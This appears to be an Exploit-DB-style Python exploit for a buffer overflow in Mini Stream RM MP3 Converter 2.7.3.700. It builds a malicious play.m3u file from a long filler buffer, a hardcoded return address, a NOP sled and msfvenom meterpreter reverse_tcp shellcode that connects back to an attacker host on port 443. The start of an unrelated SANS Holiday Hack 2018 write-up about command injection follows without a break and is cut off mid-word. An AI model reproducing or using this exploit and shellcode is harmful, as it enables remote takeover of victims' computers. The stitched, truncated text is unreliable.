# Exploit Title: Mini Stream RM MP3 2.7.3.700 Buffer Overflow
# Date: 31.05.2017
# Exploit Author: Dibyendu Sikdar (dibsyhex)
# Vendor Homepage: http://www.downloadsource.net/5318/Mini-stream-RM-MP3-Converter-Easy-RM-to-MP3-Converter/
# Software Link: https://www.exploit-db.com/apps/1bbf03ec57b1ad30970362518e073215-Mini-streamRM-MP3Converter.exe
# Version: 2.7.3.700
# Tested on: Windows 7 Home Basic 32 bit
# Save the file as exploit.py
# Run the code as python exploit.py
# It will create a file with the exploit called play.m3u
# Run a meterpreter handler in attacker system
# Start the application. Select load. Select filetype as playlist. Open the play.m3u file
#EIP = 1001B058 [ using PUSH ESP, RETN ]
head = "A" * 35055
nop = "\x90" * 60
eip = "\x58\xB0\x01\x10"
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.30.130 LPORT=443 -f c -b "\x00\x0a\x0d"
shell = ("\xd9\xc0\xd9\x74\x24\xf4\x5f\xb8\xad\xaf\xba\x08\x31\xc9\xb1"
"\x54\x31\x47\x18\x03\x47\x18\x83\xef\x51\x4d\x4f\xf4\x41\x10"
"\xb0\x05\x91\x75\x38\xe0\xa0\xb5\x5e\x60\x92\x05\x14\x24\x1e"
"\xed\x78\xdd\x95\x83\x54\xd2\x1e\x29\x83\xdd\x9f\x02\xf7\x7c"
"\x23\x59\x24\x5f\x1a\x92\x39\x9e\x5b\xcf\xb0\xf2\x34\x9b\x67"
"\xe3\x31\xd1\xbb\x88\x09\xf7\xbb\x6d\xd9\xf6\xea\x23\x52\xa1"
"\x2c\xc5\xb7\xd9\x64\xdd\xd4\xe4\x3f\x56\x2e\x92\xc1\xbe\x7f"
"\x5b\x6d\xff\xb0\xae\x6f\xc7\x76\x51\x1a\x31\x85\xec\x1d\x86"
"\xf4\x2a\xab\x1d\x5e\xb8\x0b\xfa\x5f\x6d\xcd\x89\x53\xda\x99"
"\xd6\x77\xdd\x4e\x6d\x83\x56\x71\xa2\x02\x2c\x56\x66\x4f\xf6"
"\xf7\x3f\x35\x59\x07\x5f\x96\x06\xad\x2b\x3a\x52\xdc\x71\x52"
"\x97\xed\x89\xa2\xbf\x66\xf9\x90\x60\xdd\x95\x98\xe9\xfb\x62"
"\xdf\xc3\xbc\xfd\x1e\xec\xbc\xd4\xe4\xb8\xec\x4e\xcd\xc0\x66"
"\x8f\xf2\x14\x12\x8a\x64\x57\x4b\x8a\xf6\x3f\x8e\xb3\xf7\x04"
"\x07\x55\xa7\x2a\x48\xca\x07\x9b\x28\xba\xef\xf1\xa6\xe5\x0f"
"\xfa\x6c\x8e\xa5\x15\xd9\xe6\x51\x8f\x40\x7c\xc0\x50\x5f\xf8"
"\xc2\xdb\x6a\xfc\x8c\x2b\x1e\xee\xf8\x4d\xe0\xee\xf8\xe7\xe0"
"\x84\xfc\xa1\xb7\x30\xfe\x94\xf0\x9e\x01\xf3\x82\xd9\xfd\x82"
"\xb2\x92\xcb\x10\xfb\xcc\x33\xf5\xfb\x0c\x65\x9f\xfb\x64\xd1"
"\xfb\xaf\x91\x1e\xd6\xc3\x09\x8a\xd9\xb5\xfe\x1d\xb2\x3b\xd8"
"\x69\x1d\xc3\x0f\xea\x5a\x3b\xcd\xce\xc2\x54\x2d\x4e\xf3\xa4"
"\x47\x4e\xa3\xcc\x9c\x61\x4c\x3d\x5c\xa8\x05\x55\xd7\x3c\xe7"
"\xc4\xe8\x15\xa9\x58\xe8\x99\x72\x8c\x67\x5e\x85\xb1\x89\x63"
"\x53\x88\xff\xa4\x67\xaf\xf0\x9f\xca\x86\x9a\xdf\x59\xd8\x8e")
f = open("play.m3u","w")
payload = head+eip+nop+shell+"C"*200
f.write(payload)
f.close()
SANS HOLIDAY HACK 2018 Writeup , KRINGLECON The objectives Orientation Challenge Directory Browsing de Bruijn Sequences Data Repo Analysis AD Privilege Discovery Badge Manipulation HR Incident Response Network Traffic Forensics Ransomware Recovery Who Is Behind It All? First I go to Bushy Evergreen and try to solve the terminal challenge . Solving it is fairly easy , Escape_Key followed by ":q" without quotes After this we move to the kiosk and solve the questions The question were based on the themes of previous Holiday Hack Challenges. Once we answer it correctly we get the flag. For this I visited Minty Candycane and I tried to solve the terminal challenge. The application has command injection vulnerability , so injecting a system command with the server ip allows execution of the command. So first I perform an `ls` operation to list of the directory contents , followed by a cat of t